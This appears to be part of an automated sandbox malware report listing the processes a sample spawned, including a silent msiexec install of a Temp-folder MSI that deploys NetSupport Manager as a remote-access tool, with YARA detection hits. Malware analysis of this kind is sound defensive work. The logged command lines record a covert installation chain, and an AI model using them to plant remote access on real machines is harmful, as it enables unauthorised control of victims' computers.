                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x970000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:13
                                                                                                                      Start time:20:37:09
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x340000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:20:37:09
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0xab0000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:20:37:10
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:21
                                                                                                                      Start time:20:38:20
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                                                                                                      Imagebase:0x6a0000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2484709944.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2484886914.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2484627970.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:22
                                                                                                                      Start time:20:38:21
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                      Imagebase:0x7ff7a1480000
                                                                                                                      File size:69'632 bytes
                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:24
                                                                                                                      Start time:20:38:23
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3A
                                                                                                                      Imagebase:0x6a0000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:25
                                                                                                                      Start time:20:38:25
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                                                      Imagebase:0x7ff758890000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:26
                                                                                                                      Start time:20:38:25
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:27
                                                                                                                      Start time:20:38:25
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                                                      Imagebase:0xdd0000
                                                                                                                      File size:19'456 bytes
                                                                                                                      MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:28
                                                                                                                      Start time:20:38:26
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI264F.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                                                      Imagebase:0xae0000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI264F.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:29
                                                                                                                      Start time:20:38:27
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000
                                                                                                                      Imagebase:0x6a0000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:30
                                                                                                                      Start time:20:38:27
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI2BE4.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                                                      Imagebase:0x450000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2BE4.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:31
                                                                                                                      Start time:20:38:32
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                                                                                                      Imagebase:0xe70000
                                                                                                                      File size:551'904 bytes
                                                                                                                      MD5 hash:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.2597293331.0000000000EDB000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.2598416360.0000000000EDB000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      Target ID:32
                                                                                                                      Start time:20:38:32
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                                                                                                      Imagebase:0x170000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI3FCC.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:33
                                                                                                                      Start time:20:38:34
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:winst64.exe /q /q /ex /i
                                                                                                                      Imagebase:0x7ff778ee0000
                                                                                                                      File size:345'056 bytes
                                                                                                                      MD5 hash:96E987D909600D34DD70C55F56EB8869
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:34
                                                                                                                      Start time:20:38:37
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI51C1.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                                                                                                      Imagebase:0xd40000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI51C1.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:35
                                                                                                                      Start time:20:38:37
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                                                                                                      Imagebase:0x730000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000003.2650049408.0000000000968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000003.2650414598.0000000000954000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000003.2650546737.0000000000968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000000.2645950640.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 12%, ReversingLabs
                                                                                                                      Has exited:false

                                                                                                                      Target ID:36
                                                                                                                      Start time:20:38:38
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                                                                                                                      Imagebase:0xd40000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000000.2661196429.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000002.2673004138.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000002.2672514031.0000000000845000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      Target ID:37
                                                                                                                      Start time:20:38:39
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                                                                                                      Imagebase:0xd40000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000025.00000002.2666174324.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000025.00000000.2665153542.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:38
                                                                                                                      Start time:20:38:39
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                                                                                                      Imagebase:0x730000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695492759.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000000.2666385181.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2702240534.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:40
                                                                                                                      Start time:20:38:45
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                                                                                                      Imagebase:0x7ff71e800000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000000.2728490909.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2757688060.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Target ID:41
                                                                                                                      Start time:20:38:47
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:42
                                                                                                                      Start time:20:38:47
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850
                                                                                                                      Imagebase:0x940000
                                                                                                                      File size:144'896 bytes
                                                                                                                      MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
